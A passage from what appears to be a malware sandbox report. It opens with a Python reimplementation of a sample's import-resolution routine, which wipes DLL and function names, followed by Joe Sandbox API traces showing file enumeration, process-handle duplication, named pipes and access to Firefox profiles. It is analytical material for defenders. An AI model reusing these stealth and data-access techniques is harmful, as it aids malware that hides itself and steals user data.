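            by_ordinal = bool(thunk & IMAGE_ORDINAL_FLAG32)
            if by_ordinal:
                key = thunk & 0xFFFF                    # PE spec: ordinal in the low word
            else:
                if thunk + 2 >= size_of_image:
                    raise ValueError("import name outside the image")
                key = img[thunk + 2:cstr_end(img, thunk + 2)].decode("ascii")
            addr = table.get(key)
            if addr is None:
                status = ERROR_PROC_NOT_FOUND           # GetProcAddress failed: remember it,
                break                                   # then move on to the next DLL
            if not by_ordinal:
                wipe(img, thunk + 2)                    # erase the function name too
            struct.pack_into("<I", img, iat + i, addr)
            i += 4
        desc += 0x14
    return status
```

After a successful run the IAT holds the supplied addresses while "kernel32.dll" and "LoadLibraryA" have been zeroed in place (the Hint word survives, as in the decompiled routine, which wipes from name+2). A missing DLL aborts with 0x7e before anything is wiped; a missing function records 0x7f for the remaining descriptors, which is the behaviour the L18/L19 path of E00401398 shows.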

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00371BC8
                      • lstrcpyW.KERNEL32(00000000,00371DC8), ref: 00371BD9
                      • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371BF0
                      • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,00371DC8,?,?), ref: 00371C0A
                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00371C3A
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371C48
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                      • String ID: \sols
                      • API String ID: 2686460493-25449109
                      • Opcode ID: 1db0d4f82c1ba6aad9641b49d98d9ae0f6c63f5be72955b7b39148f8bdf43866
                      • Instruction ID: f5c2cc83440edffa023439a1af96f4cb32b75c753470a29ab576f60fc04e8bb6
                      • Opcode Fuzzy Hash: 1db0d4f82c1ba6aad9641b49d98d9ae0f6c63f5be72955b7b39148f8bdf43866
                      • Instruction Fuzzy Hash: F621D133154205BFD3236B68DC85E7FBBACEF85B81F01041BF505922A0DB669C059BA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00372916
                      • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00372934
                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0037293C
                      • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0037295A
                      • GetLastError.KERNEL32 ref: 0037296E
                      • RegCloseKey.ADVAPI32(?), ref: 00372979
                      • CloseHandle.KERNEL32(00000000), ref: 00372980
                      • GetLastError.KERNEL32 ref: 00372988
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                      • String ID:
                      • API String ID: 3822162776-0
                      • Opcode ID: 52e53888fe8cf3c8c90158e1aa361e04c884ce0a3dafed8864db6c4587ef9641
                      • Instruction ID: 1c835b876e4e40102f6e067205f292556060a08591ce0c2b73a54a4c26bfa97d
                      • Opcode Fuzzy Hash: 52e53888fe8cf3c8c90158e1aa361e04c884ce0a3dafed8864db6c4587ef9641
                      • Instruction Fuzzy Hash: 3C116175104209BFDB235FA0DC49FAB3B6DEB44361F158016FE09C62A0DB32C954DB20
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00389AE6: HeapFree.KERNEL32(00000000,?,?), ref: 00389B16
                        • Part of subcall function 00373B4C: RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00373B60
                        • Part of subcall function 00373B4C: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00373C47
                        • Part of subcall function 00373B4C: GetLastError.KERNEL32 ref: 00373C52
                        • Part of subcall function 00373B4C: HeapFree.KERNEL32(00000000,00000000), ref: 00373C67
                        • Part of subcall function 00373B4C: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00373C78
                      • SetEvent.KERNEL32 ref: 00376F2A
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32 ref: 00387032
                        • Part of subcall function 00386FE8: WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                        • Part of subcall function 00386FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                        • Part of subcall function 00386FE8: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                        • Part of subcall function 00386FE8: SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32(?,?,?), ref: 003870D0
                        • Part of subcall function 00386FE8: CloseHandle.KERNEL32(?), ref: 003870DC
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00376FB6
                      • RegOpenKeyA.ADVAPI32(80000001,0039E962,?), ref: 00376FE6
                      • RegCloseKey.ADVAPI32(?), ref: 0037700D
                        • Part of subcall function 0037B5CD: HeapFree.KERNEL32(00000000,?,00000000), ref: 0037B634
                        • Part of subcall function 0038940B: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0038943C
                        • Part of subcall function 0038940B: RtlNtStatusToDosError.NTDLL(C000009A), ref: 00389477
                        • Part of subcall function 00386F0A: CreateFileW.KERNEL32(0039F998,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00386F28
                        • Part of subcall function 00386F0A: GetFileSize.KERNEL32(00000000,00000000,?,?,003913E1,00000000,0039F998,00000000), ref: 00386F38
                        • Part of subcall function 00386F0A: ReadFile.KERNEL32(0039F998,00000000,00000000,00000000,00000000), ref: 00386F64
                        • Part of subcall function 00386F0A: GetLastError.KERNEL32(?,?,003913E1,00000000,0039F998,00000000), ref: 00386F89
                        • Part of subcall function 00386F0A: CloseHandle.KERNEL32(000000FF), ref: 00386F9A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CloseFind$Error$FreeHeapLastObjectSingleWait$CreateCriticalFirstHandleNextOpenSectionmemset$EnterEventInformationLeavePointerQueryReadSizeStatusSystemWritewcscpy
                      • String ID: %APPDATA%\Mozilla\Firefox\Profiles$9
                      • API String ID: 3074796919-4152207650
                      • Opcode ID: db6c779c0cb17182cf8fb3ac27460dd7b26503753026b5d3de9b9f069fe45957
                      • Instruction ID: 30703f105562d53a39e6208fd869154a8c8e1693a43edd278f0a83424b272a72
                      • Opcode Fuzzy Hash: db6c779c0cb17182cf8fb3ac27460dd7b26503753026b5d3de9b9f069fe45957
                      • Instruction Fuzzy Hash: 1B412371614300AFDB22EF65DC82AAAB7EDFB84754F00882EF588D71A1D775DC048B91
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RegCreateKeyA.ADVAPI32(80000001,?), ref: 0037A0B8
                      • HeapFree.KERNEL32(00000000,?), ref: 0037A0F9
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037A109
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0037AC33,00000000,?,?,?), ref: 0037A199
                        • Part of subcall function 00379EE0: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00379F3B
                        • Part of subcall function 00379EE0: RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00379F66
                        • Part of subcall function 00379EE0: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379F85
                        • Part of subcall function 00379EE0: HeapFree.KERNEL32(00000000,00000000), ref: 00379FE6
                        • Part of subcall function 00379EE0: memcpy.NTDLL(?,00000000,Hp9,00000000,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048), ref: 0037A008
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0037A175
                        • Part of subcall function 0037976C: lstrlen.KERNEL32(?,00397048,00000000), ref: 00379791
                        • Part of subcall function 0037976C: wsprintfA.USER32 ref: 003797D1
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 00379805
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 0037983E
                        • Part of subcall function 0037976C: memcpy.NTDLL(?,0039D4FB,-000000FA), ref: 003798A1
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,?,0039D500), ref: 003798F0
                        • Part of subcall function 0037976C: memcpy.NTDLL(?,?,00000000), ref: 0037990A
                        • Part of subcall function 0037976C: memcpy.NTDLL(?,00000000,0037AE2C), ref: 00379929
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 0037993F
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,?), ref: 00379963
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 003799A5
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 003799C4
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,0039E415,?,?,0037AE2C,00397048,00000000), ref: 003799E3
                        • Part of subcall function 0037976C: StrChrA.SHLWAPI(00000000,0000003B), ref: 003799F9
                        • Part of subcall function 0037976C: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 00379A0E
                        • Part of subcall function 0037976C: memmove.NTDLL(00000000,00000000,0037AE2C,?,?,?,?,?,?,?,0039E415,?,?,0037AE2C,00397048,00000000), ref: 00379A33
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379A7E
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00379A9A
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,0039D4F9,-00000008,?,?,?,?,?,?,?,?,0039E415,?,?,0037AE2C,00397048), ref: 00379AB9
                        • Part of subcall function 0037976C: StrChrA.SHLWAPI(00000000,0000002C), ref: 00379ACC
                        • Part of subcall function 0037976C: StrTrimA.SHLWAPI(00000000,003973F4), ref: 00379AE5
                        • Part of subcall function 0037976C: StrTrimA.SHLWAPI(?,003973F4), ref: 00379AF3
                        • Part of subcall function 0037976C: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00379B02
                        • Part of subcall function 0037976C: StrToIntExA.SHLWAPI(?,00000000,?), ref: 00379B1D
                        • Part of subcall function 0037976C: memmove.NTDLL(0039D500,00000000,0037AE2C,?,?,?,?,?,?,?,?,?,?,?,0039E415,?), ref: 00379B51
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379B9D
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00379BB9
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,0039D4F9,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,0039E415), ref: 00379BD8
                        • Part of subcall function 0037976C: memmove.NTDLL(0039D500,00000000,0037AE2C,00000000,00000001), ref: 00379C1B
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379C67
                        • Part of subcall function 0037976C: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00379C83
                        • Part of subcall function 0037976C: memcpy.NTDLL(00000000,0039D4FB,-00000006), ref: 00379CA2
                        • Part of subcall function 0037976C: memmove.NTDLL(0039D500,00000000,0037AE2C), ref: 00379CD7
                        • Part of subcall function 0037976C: HeapFree.KERNEL32(00000000,00000000), ref: 00379D16
                      • HeapFree.KERNEL32(00000000,?), ref: 0037A1BE
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037A1D3
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$Allocate$memmove$Trim$CloseCreatelstrlenwsprintf
                      • String ID:
                      • API String ID: 1423086-0
                      • Opcode ID: 9bf6c9cc6a597d063c9ec1eacc0bdcfe31eb3a8a7d522f818901d2f9b5345fbc
                      • Instruction ID: dae3b729723c7abbdc1225dc09e79a7f2959843f32c3a6d90b42648e7a7a31de
                      • Opcode Fuzzy Hash: 9bf6c9cc6a597d063c9ec1eacc0bdcfe31eb3a8a7d522f818901d2f9b5345fbc
                      • Instruction Fuzzy Hash: 4751A0B6D00119EFDF12DF94DC858EEBBB9FB48344F10846AE509A2260D33A5E90DF61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • StrChrA.SHLWAPI(00000000,00000020), ref: 0037DE47
                      • StrTrimA.SHLWAPI(00000000,003973FC), ref: 0037DE5D
                        • Part of subcall function 00373D02: HeapFree.KERNEL32(00000000,?,?), ref: 00373D85
                      • RtlImageNtHeader.NTDLL(?), ref: 0037DE85
                      • HeapFree.KERNEL32(00000000,?), ref: 0037DEAF
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 0037196A: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 003719D5
                        • Part of subcall function 0037196A: HeapFree.KERNEL32(00000000,00000000), ref: 003719FD
                      • lstrlen.KERNEL32(00000000,00000000,?), ref: 0037DF17
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037DF46
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0037DF64
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$lstrlen$FileTime$CloseCurrentHeaderImageNameSystemTempThreadTrimlstrcpymemcpymemset
                      • String ID:
                      • API String ID: 1859285976-0
                      • Opcode ID: add02612de0bd4f63faf8d3b8efb5dd999aeef1a08001ab4c81f1237c2ef4c52
                      • Instruction ID: bf4350f4b2e693690588f9d0c3906b8a8248b2e263b885e9e56469bf66936675
                      • Opcode Fuzzy Hash: add02612de0bd4f63faf8d3b8efb5dd999aeef1a08001ab4c81f1237c2ef4c52
                      • Instruction Fuzzy Hash: 4031F532204301BBD7337B24AC4AF6B7ABDEF84B51F054429F58D5A1D0DB6A8C44D752
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 0038B92E
                      • memcpy.NTDLL(0000002C,?,00000010,00000000,00000000,00000054,00000054), ref: 0038B93C
                      • RtlInitializeCriticalSection.NTDLL(00000008), ref: 0038B948
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B95B
                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B975
                      • CreateThread.KERNEL32(00000000,00000000,0038B64A,?,00000000,00000000), ref: 0038B9BF
                      • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 0038B9DF
                        • Part of subcall function 0038BA07: SetEvent.KERNEL32(?,00371F20,?,0039D270,?,00000000,003713EB), ref: 0038BA1B
                        • Part of subcall function 0038BA07: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038BA35
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA3E
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA4C
                        • Part of subcall function 0038BA07: RtlEnterCriticalSection.NTDLL(00000008), ref: 0038BA58
                        • Part of subcall function 0038BA07: RtlLeaveCriticalSection.NTDLL(00000008), ref: 0038BA81
                        • Part of subcall function 0038BA07: Sleep.KERNEL32(000001F4), ref: 0038BA90
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA9D
                        • Part of subcall function 0038BA07: LocalFree.KERNEL32(?), ref: 0038BAAB
                        • Part of subcall function 0038BA07: RtlDeleteCriticalSection.NTDLL(00000008), ref: 0038BAB5
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseCreateHandle$Event$AllocateDeleteEnterErrorFreeHeapInitializeLastLeaveLocalMutexObjectSingleSleepThreadWaitmemcpymemset
                      • String ID:
                      • API String ID: 4282890707-0
                      • Opcode ID: b212f210f14a27a83d6de94fc095f8b24c38702b86c7f61495af92620c948c7e
                      • Instruction ID: 670c40c46e8acc89273d92ff8d681624001a63cbe7b576983e12b13cdd254e06
                      • Opcode Fuzzy Hash: b212f210f14a27a83d6de94fc095f8b24c38702b86c7f61495af92620c948c7e
                      • Instruction Fuzzy Hash: 2131C471500712AFC332AF668C89917FBFCFB85765F144A1EF6A6C2290E37298458B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • InterlockedIncrement.KERNEL32(0039D19C), ref: 00371F79
                      • lstrcpy.KERNEL32(00000000), ref: 00371FAE
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                        • Part of subcall function 0038E3FE: memset.NTDLL ref: 0038E412
                      • HeapFree.KERNEL32(00000000,?), ref: 00372056
                        • Part of subcall function 0038E5EC: memset.NTDLL ref: 0038E647
                        • Part of subcall function 0038E5EC: SetLastError.KERNEL32(00000000,?,?,?), ref: 0038E69B
                        • Part of subcall function 0038E5EC: WaitForSingleObject.KERNEL32(?,?), ref: 0038E81A
                        • Part of subcall function 0038E5EC: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 0038E82B
                      • GetLastError.KERNEL32(00000000), ref: 0037203F
                      • InterlockedDecrement.KERNEL32(0039D19C), ref: 0037206D
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037209E
                        • Part of subcall function 003779BC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                        • Part of subcall function 003779BC: lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                        • Part of subcall function 003779BC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                        • Part of subcall function 003779BC: mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                        • Part of subcall function 003779BC: CloseHandle.KERNEL32(?), ref: 00377A61
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • DeleteFileA.KERNEL32(00000000), ref: 0037208E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFree$ErrorInterlockedLastTimelstrcpylstrlenmemset$AllocateCloseCreateCurrentDecrementDeleteHandleIncrementNameObjectSingleSleepSystemTempThreadWaitmbstowcs
                      • String ID:
                      • API String ID: 3667511681-0
                      • Opcode ID: 90a124533ff260b25fbdd79a9428b1857d57cf0892dc0c6bf3f0d00c910b98e8
                      • Instruction ID: d05feae4d4def69f7c98502bcb8e098bea451553f1734835de467fa3408306cf
                      • Opcode Fuzzy Hash: 90a124533ff260b25fbdd79a9428b1857d57cf0892dc0c6bf3f0d00c910b98e8
                      • Instruction Fuzzy Hash: CC310A32900214FBCB33AFA5DC45AAE7A79EF48750F118056F909EB290D77A8E41D7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00375A17: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375A1F
                        • Part of subcall function 00375A17: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375A34
                        • Part of subcall function 00375A17: InterlockedIncrement.KERNEL32(0000001C), ref: 00375A4D
                      • lstrlen.KERNEL32(00000008,?,?,?,003741E9,00000000,00000000), ref: 00375AC1
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00375AE3
                      • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,003741E9,00000000,00000000), ref: 00375AF5
                      • lstrcpy.KERNEL32(00000020,00000008), ref: 00375B27
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375B33
                      • Sleep.KERNEL32(0000000A), ref: 00375B3D
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375B8B
                        • Part of subcall function 003759AC: InterlockedDecrement.KERNEL32(0000001C), ref: 003759B0
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterInterlockedLeave$DecrementFreeHeapIncrementSleeplstrcpylstrlenmemcpy
                      • String ID:
                      • API String ID: 1050082636-0
                      • Opcode ID: 62f60a4e8ecc9d61eb4844974b69805259a9190b95a13f3dc076f2db65c72d10
                      • Instruction ID: 48d5278a6a6fe9b7c6a77967813c8eae7bc647dbe81716f659ac437ed795b72a
                      • Opcode Fuzzy Hash: 62f60a4e8ecc9d61eb4844974b69805259a9190b95a13f3dc076f2db65c72d10
                      • Instruction Fuzzy Hash: C84158B1510B05EFCB279F64DC85B6ABBF8FF08315F11851AE80997260D7BADA50CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003773DE
                      • memset.NTDLL ref: 003773FB
                      • WaitForSingleObject.KERNEL32(00000000), ref: 00377417
                      • GetDriveTypeW.KERNEL32(?), ref: 00377425
                      • lstrlenW.KERNEL32(?), ref: 00377431
                        • Part of subcall function 00387121: memset.NTDLL ref: 003871C1
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 003871DC
                        • Part of subcall function 00387121: memset.NTDLL ref: 0038723F
                        • Part of subcall function 00387121: wcscpy.NTDLL ref: 00387251
                        • Part of subcall function 00387121: RtlEnterCriticalSection.NTDLL(?), ref: 003872AD
                        • Part of subcall function 00387121: RtlLeaveCriticalSection.NTDLL(?), ref: 003872C9
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003872E2
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003872F4
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 00387309
                        • Part of subcall function 00387121: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0038731D
                        • Part of subcall function 00387121: FindNextFileW.KERNEL32(?,00000000), ref: 003873B5
                        • Part of subcall function 00387121: WaitForSingleObject.KERNEL32(00000000), ref: 003873C7
                        • Part of subcall function 00387121: FindClose.KERNEL32(?), ref: 003873E2
                      • lstrlenW.KERNEL32(?), ref: 0037745E
                      • HeapFree.KERNEL32(00000000,?), ref: 00377477
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$File$ObjectSingleWaitmemset$CloseCriticalFirstHeapNextSectionlstrlen$AllocateDriveEnterFreeLeaveTypewcscpy
                      • String ID:
                      • API String ID: 1952197925-0
                      • Opcode ID: 50d0efd8d1c66b4a7cf0b68643ad40931a071eadff9e95f5f07a591a829e189f
                      • Instruction ID: 91f58927fbb42283b4ea3102ebf7ee00a7114b05f2840b0ec162dbb0481cc827
                      • Opcode Fuzzy Hash: 50d0efd8d1c66b4a7cf0b68643ad40931a071eadff9e95f5f07a591a829e189f
                      • Instruction Fuzzy Hash: C1314B7291410CBFDF12ABA5EC85CEEBBBDEF04354F208466F505E2260D736AE549B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                      • RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                      • memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                      • memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                      • CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                      • GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                      • String ID:
                      • API String ID: 2237239663-0
                      • Opcode ID: 6e9b9fbc5af2de9492a915b40c7eca31999fe5f343b75c8800a90eb89600d461
                      • Instruction ID: 826a75083492633f921a56e686ffb26e2f6d9ede572ada0947372210645d1c57
                      • Opcode Fuzzy Hash: 6e9b9fbc5af2de9492a915b40c7eca31999fe5f343b75c8800a90eb89600d461
                      • Instruction Fuzzy Hash: F731A036910209EFDB22DFA5DC45AAB7BBCFB04750F00843AFA4992250E339D954DBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetLastError.KERNEL32 ref: 00387032
                      • WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                      • WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                      • SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                      • GetLastError.KERNEL32(?,?,?), ref: 003870D0
                      • CloseHandle.KERNEL32(?), ref: 003870DC
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$CloseHandleObjectPointerSingleWaitWrite
                      • String ID:
                      • API String ID: 2772011183-0
